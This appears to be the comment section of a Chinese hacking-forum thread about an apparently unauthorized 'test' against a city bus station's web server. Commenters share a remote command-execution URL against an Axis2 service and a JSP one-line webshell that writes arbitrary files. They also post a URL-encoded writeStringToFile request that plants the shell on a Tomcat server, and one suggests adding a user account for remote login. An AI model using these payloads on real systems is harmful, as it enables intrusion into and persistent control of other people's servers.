实战：对本市汽车站的一次测试

感谢楼主分享

http://www.xxx.com/axis2/services/Cat/exec?cmd=whoami   都能执行命令了  为什么还要去webshell没尝试过添加个用户密码然后远程？

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>
一句话 收藏了

那我赶紧收藏这段payload
/axis2/services/Cat/writeStringToFile?data=%3c%25%20%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%20%25%3e&file=/D:/tomcat8/webapps//axis2/1.jsp&encoding=utf-8&append=false

本山叔叔 发表于 2021-1-11 16:01
http://www.xxx.com/axis2/services/Cat/exec?cmd=whoami   都能执行命令了  为什么还要去webshell没尝试过 ...

端口没开，有防护